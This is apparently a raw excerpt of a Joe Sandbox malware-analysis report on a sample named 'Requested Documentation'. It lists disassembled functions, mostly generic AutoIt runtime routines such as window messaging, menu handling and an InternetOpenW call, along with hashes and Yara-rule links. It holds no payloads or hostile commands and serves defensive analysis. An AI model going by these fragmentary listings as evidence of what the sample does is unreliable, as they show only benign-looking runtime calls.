                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: Combobox
                                                                              • API String ID: 3850602802-2096851135
                                                                              • Opcode ID: 3f8e3de09419f68bf6f6e91d9f2fe9fa2269eac39c66d2c3c95c4c938f4fdee4
                                                                              • Instruction ID: b66b3037001e70e0321c66483c45ec62396b39c6645d529ba4e79f72bc62c32a
                                                                              • Opcode Fuzzy Hash: 3f8e3de09419f68bf6f6e91d9f2fe9fa2269eac39c66d2c3c95c4c938f4fdee4
                                                                              • Instruction Fuzzy Hash: C811B67560020DAFEF11DF54DC80EAB376AEB8436CF100129F914972D0D671DC6187A0
                                                                              Function 00A06C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00981D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00981D73
                                                                                • Part of subcall function 00981D35: GetStockObject.GDI32(00000011), ref: 00981D87
                                                                                • Part of subcall function 00981D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00981D91
                                                                              • GetWindowRect.USER32(00000000,?), ref: 00A06C71
                                                                              • GetSysColor.USER32(00000012), ref: 00A06C8B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                              • String ID: static
                                                                              • API String ID: 1983116058-2160076837
                                                                              • Opcode ID: 76d9e7d72afb15b1cdb9ddcca8a3e24c30563085e2ad2e410f75c28b7b323a11
                                                                              • Instruction ID: a9d8f497e70c836b9cc2108e7edbbac7f4891a0b76ffeeb9a6517c9bb7e96197
                                                                              • Opcode Fuzzy Hash: 76d9e7d72afb15b1cdb9ddcca8a3e24c30563085e2ad2e410f75c28b7b323a11
                                                                              • Instruction Fuzzy Hash: 8421297651020DAFDF14DFB8DC45AFA7BB8FB08318F004629F995E2290D635E861DB60
                                                                              Function 00A06920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 00A069A2
                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00A069B1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: LengthMessageSendTextWindow
                                                                              • String ID: edit
                                                                              • API String ID: 2978978980-2167791130
                                                                              • Opcode ID: dc0262968da26381e6a5563f08e3758fb3d8010d11a91e578d816b8650721aad
                                                                              • Instruction ID: 20e49841a03bae350b656820f2961ad37e8ec9cdcefefc4364f27a33847092a2
                                                                              • Opcode Fuzzy Hash: dc0262968da26381e6a5563f08e3758fb3d8010d11a91e578d816b8650721aad
                                                                              • Instruction Fuzzy Hash: 8E116D7150020CAFEB108F64AC44AEB3669EB053B8F504724F9A5A75E0C771DC619760
                                                                              Function 009E29AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 009E2A22
                                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 009E2A41
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: InfoItemMenu_memset
                                                                              • String ID: 0
                                                                              • API String ID: 2223754486-4108050209
                                                                              • Opcode ID: bc5b6e434d2a002c58ce3d3f18b8b6693348d4ec04910237b61dc38287479ef3
                                                                              • Instruction ID: 0b5bae218dae25375ef4b959d1aeb6693725c43605bf245df2084757851a1dd6
                                                                              • Opcode Fuzzy Hash: bc5b6e434d2a002c58ce3d3f18b8b6693348d4ec04910237b61dc38287479ef3
                                                                              • Instruction Fuzzy Hash: 4311E236D01294EBCB32DBA9DC44BAA73BDAB86304F144031E855E72D1D770ED0AC791
                                                                              Function 009F21D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 009F222C
                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 009F2255
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$OpenOption
                                                                              • String ID: <local>
                                                                              • API String ID: 942729171-4266983199
                                                                              • Opcode ID: 7c9447c21ac02f2660a5b7eeb64007e6744b6eecb2504990f3fd2cc9c40e1e8c
                                                                              • Instruction ID: c56e100808e5511209ecddedb86302e982d284fedb3a5a9473b8315b433492ef
                                                                              • Opcode Fuzzy Hash: 7c9447c21ac02f2660a5b7eeb64007e6744b6eecb2504990f3fd2cc9c40e1e8c
                                                                              • Instruction Fuzzy Hash: CD11E070641229BAEB298F518C95FFBFBACFF06751F10862AFA2456040D2706881D7F1
                                                                              Function 009D8E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                                • Part of subcall function 009DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 009DAABC
                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 009D8E73
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameSend_memmove
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 372448540-1403004172
                                                                              • Opcode ID: f97751de70a10aba16a55c5a13fb50ba6309e57dd4a90c6369a654ef5d37861b
                                                                              • Instruction ID: 162e8cd625ea402f3ed16ee2809cf9ffb4af688bf8ce71ebd909241b696ce821
                                                                              • Opcode Fuzzy Hash: f97751de70a10aba16a55c5a13fb50ba6309e57dd4a90c6369a654ef5d37861b
                                                                              • Instruction Fuzzy Hash: 4C01F5B1641218ABCF14FBE0CC419FE7369AF81320B504A1AF821573D2DE319809C760
                                                                              Function 009D8CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                                • Part of subcall function 009DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 009DAABC
                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 009D8D6B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameSend_memmove
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 372448540-1403004172
                                                                              • Opcode ID: 962df3eec8dafdb184d43a23b6f0a9a06c6209513b8d3d575b30a464b20de979
                                                                              • Instruction ID: 9ef452ea82a23f0770818d561d85f753842504261850f32fb8cf0337b0f698be
                                                                              • Opcode Fuzzy Hash: 962df3eec8dafdb184d43a23b6f0a9a06c6209513b8d3d575b30a464b20de979
                                                                              • Instruction Fuzzy Hash: 3601DFB5A81108BBCF24EBE0C952BFF73A99F55340F60441AB802633E2DE259E08D371
                                                                              Function 009D8D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22
                                                                                • Part of subcall function 009DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 009DAABC
                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 009D8DEE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ClassMessageNameSend_memmove
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 372448540-1403004172
                                                                              • Opcode ID: 9a093d8f8493bb20895b24fb78961fa382cadaacfa183eb8b00aea64d50cf021
                                                                              • Instruction ID: 726c42289c5f45f94ca6a4cde38ba74c3af42b42afd54775d4590306bee9d45c
                                                                              • Opcode Fuzzy Hash: 9a093d8f8493bb20895b24fb78961fa382cadaacfa183eb8b00aea64d50cf021
                                                                              • Instruction Fuzzy Hash: 3301A2B1A81109BBDF21FAE4C942BFF77AD9F11300F518516B805A33D2DE259E19D271
                                                                              Function 009E4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: ClassName_wcscmp
                                                                              • String ID: #32770
                                                                              • API String ID: 2292705959-463685578
                                                                              • Opcode ID: c9e3069a04e9f03bda8809d64417583147f083e1a1126d120b05f5d81c93c902
                                                                              • Instruction ID: 786c3c20067b8b518241557f7ec9c595db90a54e147bf68f942338088c0a80fb
                                                                              • Opcode Fuzzy Hash: c9e3069a04e9f03bda8809d64417583147f083e1a1126d120b05f5d81c93c902
                                                                              • Instruction Fuzzy Hash: 18E0D13690432C2BD720DB999C45FA7F7ACEB86B71F000057FD04D7051D5609B4687D1
                                                                              Function 009BB2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 009BB314: _memset.LIBCMT ref: 009BB321
                                                                                • Part of subcall function 009A0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,009BB2F0,?,?,?,0098100A), ref: 009A0945
                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,0098100A), ref: 009BB2F4
                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0098100A), ref: 009BB303
                                                                              Strings
                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 009BB2FE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                              • API String ID: 3158253471-631824599
                                                                              • Opcode ID: dd452b19dee53cdfcc87eca2987aee77e3592f85bffc3b891036c228be995b01
                                                                              • Instruction ID: ca6df35b513dd218c0c460895dcbbd6a600127684c0ee59d10b5862d6ed4ca17
                                                                              • Opcode Fuzzy Hash: dd452b19dee53cdfcc87eca2987aee77e3592f85bffc3b891036c228be995b01
                                                                              • Instruction Fuzzy Hash: 23E06D742007108FD770DF68E5043867AE8AF84724F018A3DE456C7681E7F5E405CBA1
                                                                              Function 009D7C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009D7C82
                                                                                • Part of subcall function 009A3358: _doexit.LIBCMT ref: 009A3362
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Message_doexit
                                                                              • String ID: AutoIt$Error allocating memory.
                                                                              • API String ID: 1993061046-4017498283
                                                                              • Opcode ID: 77c519d01b5eaebffae98b65a1f6067027da724c70e1107e56dec336ec2a2f69
                                                                              • Instruction ID: 794091b901e1c015abd2c71f083288cbce94fd75e28959609b3183af82b79ad9
                                                                              • Opcode Fuzzy Hash: 77c519d01b5eaebffae98b65a1f6067027da724c70e1107e56dec336ec2a2f69
                                                                              • Instruction Fuzzy Hash: DBD05B323C83583BD62532F56C07FCA754C4F46B52F144816FB08696D34DD245D152E5
                                                                              Function 009C1935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 009C1775
                                                                                • Part of subcall function 009FBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,009C195E,?), ref: 009FBFFE
                                                                                • Part of subcall function 009FBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 009FC010
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 009C196D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                              • String ID: WIN_XPe
                                                                              • API String ID: 582185067-3257408948
                                                                              • Opcode ID: 576a7303e32f608f6dddc2b82ad13d51d05812532e59ee5e98d6c8f6fc376a4b
                                                                              • Instruction ID: 8ed217c7c54946723647be0215dd202859fe7d1c70cfdc376e5e1e336e2ae071
                                                                              • Opcode Fuzzy Hash: 576a7303e32f608f6dddc2b82ad13d51d05812532e59ee5e98d6c8f6fc376a4b
                                                                              • Instruction Fuzzy Hash: FAF0A57080410DDFDB26DBA1C994BECBAF8AB49301F540499E102B6191D7754E86DF66
                                                                              Function 00A05998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A059AE
                                                                              • PostMessageW.USER32(00000000), ref: 00A059B5
                                                                                • Part of subcall function 009E5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E52BC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FindMessagePostSleepWindow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 529655941-2988720461
                                                                              • Opcode ID: 315310e532ef519e9888c80dcc199f525b38a50ed5bbd305569c4464ce3ca452
                                                                              • Instruction ID: 30941cbed10a4a420abc6525a0c72ac6e9e5e95d9284f5ffd52402d73ef33fb4
                                                                              • Opcode Fuzzy Hash: 315310e532ef519e9888c80dcc199f525b38a50ed5bbd305569c4464ce3ca452
                                                                              • Instruction Fuzzy Hash: 8DD0C9317843557BE678ABB09C0BF966615BB44B51F010825B356AA5D4C9E4A802C654
                                                                              Function 00A05964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A0596E
                                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00A05981
                                                                                • Part of subcall function 009E5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009E52BC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1738139804.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                              • Associated: 00000000.00000002.1737960204.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738210581.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738512749.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1738544671.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_980000_Requested Documentation.jbxd
                                                                              Similarity
                                                                              • API ID: FindMessagePostSleepWindow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 529655941-2988720461
                                                                              • Opcode ID: 966ae2bdfdfd85ddcf8fdb27d4bce2f4c059d928f89d5bcf4e5131369fe26c7f
                                                                              • Instruction ID: 372bfc3cafae136b6c92b2c4e21baad3812129d30edcdc0f148415b69970281b
                                                                              • Opcode Fuzzy Hash: 966ae2bdfdfd85ddcf8fdb27d4bce2f4c059d928f89d5bcf4e5131369fe26c7f
                                                                              • Instruction Fuzzy Hash: 67D0C931784355BBE678ABB09C1BF966A15BB40B51F010825B35AAA5D4C9E4A802C654